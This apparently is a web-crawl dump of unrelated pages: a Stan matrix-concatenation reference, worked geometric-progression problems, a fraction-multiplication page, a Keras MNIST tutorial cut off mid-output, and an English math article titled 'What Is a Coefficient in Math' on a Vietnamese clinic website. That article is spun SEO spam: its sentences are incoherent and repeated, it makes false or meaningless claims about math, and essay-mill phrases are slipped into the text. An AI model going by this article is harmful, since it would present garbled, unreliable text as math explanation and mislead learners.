{"ft_lang_label":"__label__en","ft_lang_prob":0.9287319,"math_prob":0.9733707,"size":4794,"snap":"2021-31-2021-39","text_gpt3_token_len":1384,"char_repetition_ratio":0.31398746,"word_repetition_ratio":0.23541453,"special_character_ratio":0.36691698,"punctuation_ratio":0.067540325,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99392855,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T09:59:42Z\",\"WARC-Record-ID\":\"<urn:uuid:8e395ccf-2b4f-41d7-9bf0-619680944fb0>\",\"Content-Length\":\"17368\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2f990ccc-564d-4fd4-a5f9-00cfd22c0d01>\",\"WARC-Concurrent-To\":\"<urn:uuid:7d44f17b-2e38-4626-8b1e-67d291137342>\",\"WARC-IP-Address\":\"104.21.81.186\",\"WARC-Target-URI\":\"https://whatpercentcalculator.com/what-is-percent-decrease-from-105-to-95\",\"WARC-Payload-Digest\":\"sha1:MYZ2WAY65KSYOER3VJOYFLEC2R57XDPO\",\"WARC-Block-Digest\":\"sha1:RGOOM25B4QLUSSMH7ZK4NFL7GFNLC2VL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153709.26_warc_CC-MAIN-20210728092200-20210728122200-00632.warc.gz\"}"}
http://khamphukhoa.org/underrated-concerns-about-what-is-a-coefficient-in-math-you-should-read-about/
[ "", null, "", null, "", null, "Cơ sở vật chất\nHiện đại hàng đầu\n\nCông nghệ tiên phong\nDẫn đầu hiệu quả\n\nĐội ngũ bác sĩ\nQuốc tế giàu kinh nghiệm\n\nDịch vụ khách hàng\n\nTại sao nên lựa chọn phòng khám đa khoa Bảo Anh\n\nPhòng khám đa khoa Bảo Anh đạt tiêu chuẩn", null, "Phòng khám đa khoa Bảo Anh đạt tiêu chuẩn", null, "The Hidden Treasure of What Is a Coefficient in Math\n\nSensitivity to the data distribution might be utilized to a benefit. The beta coefficient can be useful in attempting to predict a specific stock’s paramountessays tendencies and calculate the total risk. In the event it isn’t revealed, it may be biased.\n\nA circle with a larger diameter is probably going to have a larger circumference. Another object is presented and placed on the very same side. The outcome will be an excellent approximation to our original function.\n\nWhat Is a Coefficient in Math Secrets\n\nYou must have something that looks like this… From here, you’re going to need to utilize your imagination a bit. Select any 2 things that you use in your day-to-day life and which are related. Frequently, those who are bad at math are bad at a lot of things.\n\nThe increased part of students with learning problems are those who find it challenging to remember patterns. An individual needs to be sound in mathematics as a means to start machine learning. Math concepts might also be reinforced for the children during the day on a standard basis.\n\nSensitivity to the data distribution might be utilized to a benefit. The degree of positive correlation will likely vary over time. It is very important to be aware that correlation by no means relates https://www.deltacollege.edu/emp/pwall/documents/HowtoWriteaSummarywithDunayer.pdf to causation.\n\nWhat Is a Coefficient in Math Ideas\n\nIn the event the answer is no, then 2 isn’t a factor of 25. If every term in an expression has a lot of things, and if every term has a minumum of one factor that’s the exact same, then that factor is known as a typical aspect. Enter the expression that you want to factor, set the choices and click the Factor button.\n\nFinding out how to tackle a linear equation will give you a simple comprehension of algebra so that you will have the ability to handle more elaborate equations later. By the moment you complete these totally free math worksheets, you’re going to be a specialist at making your Algebra homework just slightly simpler. Probability In this last program, students see how the many techniques of algebra they have learned can be put on the study of probability.\n\nA division problem might be written vertically. Any number in the triangle can be seen by adding both numbers diagonally above it. Further, it is a horizontal line.\n\nOk, I Think I Understand What Is a Coefficient in Math, Now Tell Me About What Is a Coefficient in Math!\n\nA standard maths challenge is to learn whether a particular polynomial can be written as a linear blend of another polynomials. To begin with, you wish to comprehend your squares. Finding out how to tackle a linear equation will give you a very simple comprehension of algebra so you are going in order to handle more elaborate equations later.\n\nIt doesn’t alter the measurement scale. A square is a normal quadrilateral. It will be an extremely very good approximation to our original function.\n\nIn more complicated math problems, the expressions can secure a bit more involved. My sense is the fact that it’s pretty even. The Taylor expansion is one of the most gorgeous ideas in mathematics.\n\nQuestion 1 is an intricate fraction. The worth of information correlation comes into play when you have a dataset with different capabilities. It is simply the selection of input variables.\n\nThe Lost Secret of What Is a Coefficient in Math\n\nIt is a fact that there’s a giant, enormous collection of numbers out there, and each of them is distinctive college essay writing service and different in its own way. In other provisions, an item is the response to any multiplication issue. 1 While it’s a fact that this is the loneliest number, it’s also much more.\n\nRather, it is an effect of the array of classes that were selected. There are times that you’ve limited control. Let’s look at an important example.\n\nIn the problem sets below, you will also have the chance to improve at working with exponents. The matter here is the best way to define similarity. Well, formulas can be simpler or complex based on this issue you selected but there’s need of depth understanding of each one of the formula to fix a specific issue.\n\nThere are two methods to examine fractions. With the help of a calculator, the procedure of successive approximations can be accomplished quickly. The elimination way of solving systems of equations is also known as the addition system.\n\nFor businessman, for example, the correlation coefficient could be utilised to appraise the success or failure of a particular advert or company strategy. A regression involving multiple associated variables can create a curved line in some scenarios. Then you pick the biggest factor that could be located in each number.\n\nWhat Is a Coefficient in Math at a Glance\n\nStudents represent multiplication facts through the usage of context. When it is positive, the inequality will stay the same. The notion of collective comprehension and the function of society in individual understandings is hinted at too.\n\nGetting the Best What Is a Coefficient in Math\n\nThe Correlation Coefficient may be used to spot non-correlated securities, which is important in creating a diversified portfolio. Math isn’t restricted to theoretical or continuous mathematics approach but you have to have heard of discrete mathematics too. Learning Math isn’t simple and this is why we’ve discovered unique approaches to amplify your learning.\n\nWhat Is a Coefficient in Math for Dummies\n\nIn more complicated math problems, the expressions can secure a bit more involved. When it is positive, the inequality will stay the same. It is among the most attractive ideas in mathematics.\n\nThere are a few rules that may help simplify or evaluate series. It is a significant investment if you wish to have into long range shooting and will be particularly useful when you handload. Let’s look at a great example.\n\nVN:F [1.9.22_1171]\nVN:F [1.9.22_1171]", null, "Tin tức liên quan", null, "", null, "PK đa khoa Bảo Anh nỗ lực xây dựng thương hiệu thân thiện", null, "Phòng khám đa khoa Bảo Anh (Hà Nội): Nỗ lực xây dựng một thương hiệu thân thiện", null, "Trường quay trực tuyến “Sức khỏe sinh sản và an toàn tình dục”\n\nhotline : 02438288288" ]
[ null, "https://www.facebook.com/tr", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/img-uytin.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/img-hotline.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/tieu-chuan.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/single-banner.jpg", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/box-loikhuyenbacsi.gif", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/img-phongkham.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/ndt.png", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/tinmoi.jpg", null, "http://khamphukhoa.org/wp-content/themes/themepk/images/dspl.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9319287,"math_prob":0.90634394,"size":5915,"snap":"2019-26-2019-30","text_gpt3_token_len":1178,"char_repetition_ratio":0.106073424,"word_repetition_ratio":0.088709675,"special_character_ratio":0.19019443,"punctuation_ratio":0.08563782,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97953546,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,null,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-16T19:21:01Z\",\"WARC-Record-ID\":\"<urn:uuid:80199289-a3a4-403a-a15b-6fe017659733>\",\"Content-Length\":\"54073\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a4198ae2-e9e0-4bf7-8bf8-fa5dfe52a85f>\",\"WARC-Concurrent-To\":\"<urn:uuid:8f7cbdf8-cfc6-4dc0-8b23-16088de55159>\",\"WARC-IP-Address\":\"112.213.89.43\",\"WARC-Target-URI\":\"http://khamphukhoa.org/underrated-concerns-about-what-is-a-coefficient-in-math-you-should-read-about/\",\"WARC-Payload-Digest\":\"sha1:2N66UJARYN6IFYCML6A3AGQFW53SMQS5\",\"WARC-Block-Digest\":\"sha1:ZYXBSUJYHDRZTTAOLJUPL5DY3ZDFGTME\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998291.9_warc_CC-MAIN-20190616182800-20190616204800-00216.warc.gz\"}"}
https://mc-stan.org/docs/2_28/functions-reference/matrix-concatenation.html
[ "This is an old version, view current version.\n\n## 6.11 Matrix concatenation\n\nStan’s matrix concatenation operations append_col and append_row are like the operations cbind and rbind in R.\n\n#### 6.11.0.1 Horizontal concatenation\n\nmatrix append_col(matrix x, matrix y)\nCombine matrices x and y by columns. The matrices must have the same number of rows.\nAvailable since 2.5\n\nmatrix append_col(matrix x, vector y)\nCombine matrix x and vector y by columns. The matrix and the vector must have the same number of rows.\nAvailable since 2.5\n\nmatrix append_col(vector x, matrix y)\nCombine vector x and matrix y by columns. The vector and the matrix must have the same number of rows.\nAvailable since 2.5\n\nmatrix append_col(vector x, vector y)\nCombine vectors x and y by columns. The vectors must have the same number of rows.\nAvailable since 2.5\n\nrow_vector append_col(row_vector x, row_vector y)\nCombine row vectors x and y of any size into another row vector.\nAvailable since 2.5\n\nrow_vector append_col(real x, row_vector y)\nAppend x to the front of y, returning another row vector.\nAvailable since 2.12\n\nrow_vector append_col(row_vector x, real y)\nAppend y to the end of x, returning another row vector.\nAvailable since 2.12\n\n#### 6.11.0.2 Vertical concatenation\n\nmatrix append_row(matrix x, matrix y)\nCombine matrices x and y by rows. The matrices must have the same number of columns.\nAvailable since 2.5\n\nmatrix append_row(matrix x, row_vector y)\nCombine matrix x and row vector y by rows. The matrix and the row vector must have the same number of columns.\nAvailable since 2.5\n\nmatrix append_row(row_vector x, matrix y)\nCombine row vector x and matrix y by rows. The row vector and the matrix must have the same number of columns.\nAvailable since 2.5\n\nmatrix append_row(row_vector x, row_vector y)\nCombine row vectors x and y by row. The row vectors must have the same number of columns.\nAvailable since 2.5\n\nvector append_row(vector x, vector y)\nConcatenate vectors x and y of any size into another vector.\nAvailable since 2.5\n\nvector append_row(real x, vector y)\nAppend x to the top of y, returning another vector.\nAvailable since 2.12\n\nvector append_row(vector x, real y)\nAppend y to the bottom of x, returning another vector.\nAvailable since 2.12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82251185,"math_prob":0.9955631,"size":2186,"snap":"2022-27-2022-33","text_gpt3_token_len":562,"char_repetition_ratio":0.1984418,"word_repetition_ratio":0.4214876,"special_character_ratio":0.24199452,"punctuation_ratio":0.13747229,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99889964,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-17T10:36:47Z\",\"WARC-Record-ID\":\"<urn:uuid:511f8125-3de4-4a4b-9ae7-e1667ee87751>\",\"Content-Length\":\"104493\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9a000f36-2010-422a-bb7a-8ef261dc60d5>\",\"WARC-Concurrent-To\":\"<urn:uuid:e977c6f6-2f52-424b-9feb-818df758dd3a>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://mc-stan.org/docs/2_28/functions-reference/matrix-concatenation.html\",\"WARC-Payload-Digest\":\"sha1:FNTE5DJRVVWYW6FTCMCBGUMB6JTWCQPY\",\"WARC-Block-Digest\":\"sha1:SFKSJ22LMET32KUAH6SH374K477BWWMH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572898.29_warc_CC-MAIN-20220817092402-20220817122402-00043.warc.gz\"}"}
https://www.ask-math.com/solved-sums-on-geometric-progression.html
[ "# Solved sums on Geometric Progression\n\nIn this section, ask-math has given some solved sums on geometric progression. These problems help the students to learn how to solve the difficult questions on G.P. This page is based on the problems on nth terms of G.P. For that we use the following formula\n$a_{n} = ar^{n - 1}$\nwhere a= first term\ncommon ratio = r\nnumber of terms = n\n\n## solved sums on geometric progression\n\n1) The first term fo G.P is 1 and $a_{3} +a_{5}$ = 90. Find 'r'.\nSolution : We know that, $a_{n} = ar^{n - 1}$ and\nfirst term = a = 1\n∴ $a_{3} = 1 \\times r^{3 - 1}$ ⇒ $a_{3} = r^{2}$\nsimilarly, $a_{5} = 1 \\times r^{5 - 1}$ ⇒ $a_{5} = r^{4}$\nAs $a_{3} +a_{5}$ = 90\n$r^{2} + r^{4}$ = 90\n$r^{4} + r^{2}$ - 90 = 0\nConsidering this as a quadratic equation so we will find the factors of it\n$\\left ( r^{2} \\right )^{2} + 10 r^{2} -9 r^{2}$- 90 = 0\n$r^{2}( r^{2}$ + 10) -9($r^{2}$ + 10) = 0\n∴ ( $r^{2}$ + 10)( $r^{2}$ - 9)\n∴ $r^{2}$ + 10 = 0      and $r^{2}$ - 9 = 0\n$r^{2}$ = - 10       $r^{2}$ = 9\nr =$\\pm\\sqrt{-10}$       r = $\\pm$ 3\nThe common ratio never be imaginary(complex number)\n∴ common ratio = r = $\\pm$ 3\n\n2) If the first and the nth terms of G.P. are 'a' and 'b' respectively. If 'p' is the product of the first and the nth term then prove that : $p^{2} = (ab)^{n}$\nSolution : We know that,\n$a_{n} = ar^{n - 1}$\nnth term = b\n∴ b = $ar^{n - 1}$\n\n∴ $r^{n - 1} = \\frac{b}{a}$\n\n∴ r =$\\left ( \\frac{b}{a} \\right )^\\frac{1}{n - 1}$ -----------(1)\n\nNow, the product of n terms = p\n∴ p = a $\\times$ ar $\\times ar^{2} \\times$ ...a$r^{n - 1}$\n\n= $a^{n}\\times r^{1 + 2 + 3 + ...+(n -1)}$\n\n= $a^{n}\\times r^{\\frac {n(n -1)}{2}}$\n\n=$a^{n}\\left ( \\frac{b}{a} \\right )^{\\frac{n(n-1)}{2}\\times \\frac{1}{(n -1)}}$\n\n= $a^{n}\\left ( \\frac{b}{a} \\right )^\\frac{n}{2}$\n\n= $a^{n}\\left ( \\frac{b^\\frac{n}{2}}{a^\\frac{n}{2}} \\right )$\n\np = $a^{\\frac{n}{2}} . b^{\\frac{n}{2}}$\n∴ p = $\\left ( ab \\right )^{\\frac{n}{2}}$\n∴ $p^{2} = \\left ( ab \\right )^{n}$\n\n3) If the $p^{th}, q^{th} and r^{th}$ terms of G.P. are 'a' , 'b' and 'c' respectively then prove that\n$a^{q-r}. b^{r -p} . c^{p -q}$ = 1\nSolution : We know that,\n$a_{n} = ar^{n - 1}$\nn = p,q and r and first term = A and common ratio = R\n∴ $a_{p} = AR^{p - 1}$       $a_{q} = AR^{q - 1}$\n$a_{r} = AR^{r - 1}$\n$p^{th}$ term = a ,   $q^{th}$ = b    and $r^{th}$ = c\n\n∴ a = $A R^{p - 1}$       b = $A R^{q - 1}$      c =$A R^{r - 1}$\n\nWe have , $a^{q-r}. b^{r -p} . c^{p -q}$\n\nSubstitute the values of a,b and c we get\n\nL.H.S = $\\left ( AR^{(p -1)} \\right )^{(q-r)}.\\left ( AR^{(q -1)} \\right )^{(r-p)}.\\left ( AR^{(r -1)} \\right )^{(p-q)}$\n\n= $A^{(q -r +r - p + p -q)}. R^{(p-1)(q-r) +(q -1)(r-p)+(r -1)(p-q)}$\n\n= $A^{0} . R^{(pq -pr -q + r + qr-pq - r + p +rp - rq - p +q)}$\n\n= 1. $R^{0}$\n= 1 ---------Proved" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6758728,"math_prob":1.00001,"size":2986,"snap":"2020-45-2020-50","text_gpt3_token_len":1270,"char_repetition_ratio":0.13480885,"word_repetition_ratio":0.04568528,"special_character_ratio":0.50535834,"punctuation_ratio":0.08160237,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.00001,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-29T04:56:23Z\",\"WARC-Record-ID\":\"<urn:uuid:80d04b65-0c7c-4c68-a96a-380076e69a31>\",\"Content-Length\":\"112530\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b2494708-04cd-46f9-a036-ba6468b50333>\",\"WARC-Concurrent-To\":\"<urn:uuid:07daae98-67fa-40cd-96ba-251b3d22af26>\",\"WARC-IP-Address\":\"172.67.136.139\",\"WARC-Target-URI\":\"https://www.ask-math.com/solved-sums-on-geometric-progression.html\",\"WARC-Payload-Digest\":\"sha1:EEZXTRQXOFSFQP3TOZFCYZQXQXEOYVPI\",\"WARC-Block-Digest\":\"sha1:FYWWMR3UDCZRQN2BFOEZQMAMQH6WME3B\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141196324.38_warc_CC-MAIN-20201129034021-20201129064021-00434.warc.gz\"}"}
https://answers.everydaycalculation.com/multiply-fractions/6-15-times-9-7
[ "Solutions by everydaycalculation.com\n\n## Multiply 6/15 with 9/7\n\n1st number: 6/15, 2nd number: 1 2/7\n\nThis multiplication involving fractions can also be rephrased as \"What is 6/15 of 1 2/7?\"\n\n6/15 × 9/7 is 18/35.\n\n#### Steps for multiplying fractions\n\n1. Simply multiply the numerators and denominators separately:\n2. 6/15 × 9/7 = 6 × 9/15 × 7 = 54/105\n3. After reducing the fraction, the answer is 18/35\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82294786,"math_prob":0.9714607,"size":490,"snap":"2022-40-2023-06","text_gpt3_token_len":225,"char_repetition_ratio":0.19753087,"word_repetition_ratio":0.0,"special_character_ratio":0.5020408,"punctuation_ratio":0.06923077,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9781682,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-06T16:13:35Z\",\"WARC-Record-ID\":\"<urn:uuid:eb9aa314-eb84-4c7f-977b-8ffb31f7a810>\",\"Content-Length\":\"7919\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:795b8f84-83ca-4c73-93f2-577429f7449b>\",\"WARC-Concurrent-To\":\"<urn:uuid:78a5a954-7db8-4be1-a3a0-bf290662eda1>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/multiply-fractions/6-15-times-9-7\",\"WARC-Payload-Digest\":\"sha1:2Y6GLOGLYH2AUQLILNOHRBCXRNXJ2XY2\",\"WARC-Block-Digest\":\"sha1:5O5YCRXYW5WIVADSQ42G55HCK32B4TU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500356.92_warc_CC-MAIN-20230206145603-20230206175603-00420.warc.gz\"}"}
https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/3.1%20Hidden%20Layer%20Representation%20and%20Embeddings.html
[ "# Fully Connected Feed-Forward Network\n\nIn this notebook we will play with Feed-Forward FC-NN (Fully Connected Neural Network) for a classification task:\n\nImage Classification on MNIST Dataset\n\nRECALL\n\nIn the FC-NN, the output of each layer is computed using the activations from the previous one, as follows:\n\n$$h{i} = \\sigma(W_i h{i-1} + b_i)$$\n\nwhere ${h}_i$ is the activation vector from the $i$-th layer (or the input data for $i=0$), ${W}_i$ and ${b}_i$ are the weight matrix and the bias vector for the $i$-th layer, respectively.\n$\\sigma(\\cdot)$ is the activation function. In our example, we will use the ReLU activation function for the hidden layers and softmax for the last layer.\n\nTo regularize the model, we will also insert a Dropout layer between consecutive hidden layers.\n\nDropout works by “dropping out” some unit activations in a given layer, that is setting them to zero with a given probability.\n\nOur loss function will be the categorical crossentropy.\n\n## Model definition\n\nKeras supports two different kind of models: the Sequential model and the Graph model. The former is used to build linear stacks of layer (so each layer has one input and one output), and the latter supports any kind of connection graph.\n\nIn our case we build a Sequential model with three Dense (aka fully connected) layers, with some Dropout. Notice that the output layer has the softmax activation function.\n\nThe resulting model is actually a function of its own inputs implemented using the Keras backend.\n\nWe apply the binary crossentropy loss and choose SGD as the optimizer.\n\nPlease remind that Keras supports a variety of different optimizers and loss functions, which you may want to check out.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n%matplotlib inline\n\n\n## Introducing ReLU\n\nThe ReLu function is defined as $f(x) = \\max(0, x),$ \n\nA smooth approximation to the rectifier is the analytic function: $f(x) = \\ln(1 + e^x)$\n\nwhich is called the softplus function.\n\nThe derivative of softplus is $f'(x) = e^x / (e^x + 1) = 1 / (1 + e^{-x})$, i.e. the logistic function.\n\n http://www.cs.toronto.edu/~fritz/absps/reluICML.pdf by G. E. Hinton\n\n### Note: Keep in mind this function as it is heavily used in CNN\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.optimizers import SGD\n\nnb_classes = 10\n\n# FC@512+relu -> FC@512+relu -> FC@nb_classes+softmax\n\n# %load ../solutions/sol_321.py\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.optimizers import SGD\n\nmodel = Sequential()\n\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.001),\nmetrics=['accuracy'])\n\n\n## Data preparation (keras.dataset)\n\nWe will train our model on the MNIST dataset, which consists of 60,000 28x28 grayscale images of the 10 digits, along with a test set of 10,000 images.", null, "Since this dataset is provided with Keras, we just ask the keras.dataset model for training and test data.\n\nWe will:\n\n• reshape data to be in vectorial form (original data are images)\n• normalize between 0 and 1.\n\nThe binary_crossentropy loss expects a one-hot-vector as input, therefore we apply the to_categorical function from keras.utilis to convert integer labels to one-hot-vectors.\n\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train.shape\n\n(60000, 28, 28)\n\nX_train = X_train.reshape(60000, 784)\nX_test = X_test.reshape(10000, 784)\nX_train = X_train.astype(\"float32\")\nX_test = X_test.astype(\"float32\")\n\n# Put everything on grayscale\nX_train /= 255\nX_test /= 255\n\n# convert class vectors to binary class matrices\nY_train = np_utils.to_categorical(y_train, 10)\nY_test = np_utils.to_categorical(y_test, 10)\n\n\n#### Split Training and Validation Data\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train)\n\nX_train.shape\n\n(784,)\n\nplt.imshow(X_train.reshape(28, 28))\n\n<matplotlib.image.AxesImage at 0x7f7f8cea6438>", null, "print(np.asarray(range(10)))\nprint(Y_train.astype('int'))\n\n[0 1 2 3 4 5 6 7 8 9]\n[0 0 0 0 0 1 0 0 0 0]\n\nplt.imshow(X_val.reshape(28, 28))\n\n<matplotlib.image.AxesImage at 0x7f7f8ce4f9b0>", null, "print(np.asarray(range(10)))\nprint(Y_val.astype('int'))\n\n[0 1 2 3 4 5 6 7 8 9]\n[0 0 0 0 1 0 0 0 0 0]\n\n\n## Training\n\nHaving defined and compiled the model, it can be trained using the fit function. We also specify a validation dataset to monitor validation loss and accuracy.\n\nnetwork_history = model.fit(X_train, Y_train, batch_size=128,\nepochs=2, verbose=1, validation_data=(X_val, Y_val))\n\nTrain on 45000 samples, validate on 15000 samples\nEpoch 1/2\n45000/45000 [==============================] - 1s - loss: 2.1743 - acc: 0.2946 - val_loss: 2.0402 - val_acc: 0.5123\nEpoch 2/2\n45000/45000 [==============================] - 1s - loss: 1.9111 - acc: 0.6254 - val_loss: 1.7829 - val_acc: 0.6876\n\n\n### Plotting Network Performance Trend\n\nThe return value of the fit function is a keras.callbacks.History object which contains the entire history of training/validation loss and accuracy, for each epoch. We can therefore plot the behaviour of loss and accuracy during the training phase.\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\ndef plot_history(network_history):\nplt.figure()\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.plot(network_history.history['loss'])\nplt.plot(network_history.history['val_loss'])\nplt.legend(['Training', 'Validation'])\n\nplt.figure()\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.plot(network_history.history['acc'])\nplt.plot(network_history.history['val_acc'])\nplt.legend(['Training', 'Validation'], loc='lower right')\nplt.show()\n\nplot_history(network_history)", null, "", null, "After 2 epochs, we get a ~88% validation accuracy.\n\n• If you increase the number of epochs, you will get definitely better results.\n\n### Quick Exercise:\n\nTry increasing the number of epochs (if you're hardware allows to)\n\n# Your code here\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.001),\nmetrics=['accuracy'])\nnetwork_history = model.fit(X_train, Y_train, batch_size=128,\nepochs=2, verbose=1, validation_data=(X_val, Y_val))\n\nTrain on 45000 samples, validate on 15000 samples\nEpoch 1/2\n45000/45000 [==============================] - 2s - loss: 0.8966 - acc: 0.8258 - val_loss: 0.8463 - val_acc: 0.8299\nEpoch 2/2\n45000/45000 [==============================] - 1s - loss: 0.8005 - acc: 0.8370 - val_loss: 0.7634 - val_acc: 0.8382\n\n\n## Introducing the Dropout Layer\n\nThe dropout layers have the very specific function to drop out a random set of activations in that layers by setting them to zero in the forward pass. Simple as that.\n\nIt allows to avoid overfitting but has to be used only at training time and not at test time.\n\n\nkeras.layers.core.Dropout(rate, noise_shape=None, seed=None)\n\n\nApplies Dropout to the input.\n\nDropout consists in randomly setting a fraction rate of input units to 0 at each update during training time, which helps prevent overfitting.\n\nArguments\n\n• rate: float between 0 and 1. Fraction of the input units to drop.\n• noise_shape: 1D integer tensor representing the shape of the binary dropout mask that will be multiplied with the input. For instance, if your inputs have shape (batch_size, timesteps, features) and you want the dropout mask to be the same for all timesteps, you can use noise_shape=(batch_size, 1, features).\n• seed: A Python integer to use as random seed.\n\nNote Keras guarantess automatically that this layer is not used in Inference (i.e. Prediction) phase (thus only used in training as it should be!)\n\nSee keras.backend.in_train_phase function\n\nfrom keras.layers.core import Dropout\n\n## Pls note **where** the K.in_train_phase is actually called!!\nDropout??\n\nfrom keras import backend as K\n\nK.in_train_phase?\n\n\n### Exercise:\n\nTry modifying the previous example network adding a Dropout layer:\n\nfrom keras.layers.core import Dropout\n\n# FC@512+relu -> DropOut(0.2) -> FC@512+relu -> DropOut(0.2) -> FC@nb_classes+softmax\n\n# %load ../solutions/sol_312.py\n\nnetwork_history = model.fit(X_train, Y_train, batch_size=128,\nepochs=4, verbose=1, validation_data=(X_val, Y_val))\nplot_history(network_history)\n\nTrain on 45000 samples, validate on 15000 samples\nEpoch 1/4\n45000/45000 [==============================] - 2s - loss: 1.3746 - acc: 0.6348 - val_loss: 0.6917 - val_acc: 0.8418\nEpoch 2/4\n45000/45000 [==============================] - 2s - loss: 0.6235 - acc: 0.8268 - val_loss: 0.4541 - val_acc: 0.8795\nEpoch 3/4\n45000/45000 [==============================] - 1s - loss: 0.4827 - acc: 0.8607 - val_loss: 0.3795 - val_acc: 0.8974\nEpoch 4/4\n45000/45000 [==============================] - 1s - loss: 0.4218 - acc: 0.8781 - val_loss: 0.3402 - val_acc: 0.9055", null, "", null, "• If you continue training, at some point the validation loss will start to increase: that is when the model starts to overfit.\n\nIt is always necessary to monitor training and validation loss during the training of any kind of Neural Network, either to detect overfitting or to evaluate the behaviour of the model (any clue on how to do it??)\n\n# %load solutions/sol23.py\nfrom keras.callbacks import EarlyStopping\n\nearly_stop = EarlyStopping(monitor='val_loss', patience=4, verbose=1)\n\nmodel = Sequential()\n\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(),\nmetrics=['accuracy'])\n\nmodel.fit(X_train, Y_train, validation_data = (X_test, Y_test), epochs=100,\nbatch_size=128, verbose=True, callbacks=[early_stop])\n\n\n# Inspecting Layers\n\n# We already used summary\nmodel.summary()\n\n_________________________________________________________________\nLayer (type) Output Shape Param #\n=================================================================\ndense_4 (Dense) (None, 512) 401920\n_________________________________________________________________\ndropout_1 (Dropout) (None, 512) 0\n_________________________________________________________________\ndense_5 (Dense) (None, 512) 262656\n_________________________________________________________________\ndropout_2 (Dropout) (None, 512) 0\n_________________________________________________________________\ndense_6 (Dense) (None, 10) 5130\n=================================================================\nTotal params: 669,706\nTrainable params: 669,706\nNon-trainable params: 0\n_________________________________________________________________\n\n\n### model.layers is iterable\n\nprint('Model Input Tensors: ', model.input, end='\\n\\n')\nprint('Layers - Network Configuration:', end='\\n\\n')\nfor layer in model.layers:\nprint(layer.name, layer.trainable)\nprint('Layer Configuration:')\nprint(layer.get_config(), end='\\n{}\\n'.format('----'*10))\nprint('Model Output Tensors: ', model.output)\n\nModel Input Tensors: Tensor(\"dense_4_input:0\", shape=(?, 784), dtype=float32)\n\nLayers - Network Configuration:\n\ndense_4 True\nLayer Configuration:\n{'batch_input_shape': (None, 784), 'name': 'dense_4', 'units': 512, 'bias_regularizer': None, 'bias_initializer': {'config': {}, 'class_name': 'Zeros'}, 'trainable': True, 'activation': 'relu', 'use_bias': True, 'bias_constraint': None, 'activity_regularizer': None, 'kernel_regularizer': None, 'kernel_constraint': None, 'kernel_initializer': {'config': {'seed': None, 'mode': 'fan_avg', 'scale': 1.0, 'distribution': 'uniform'}, 'class_name': 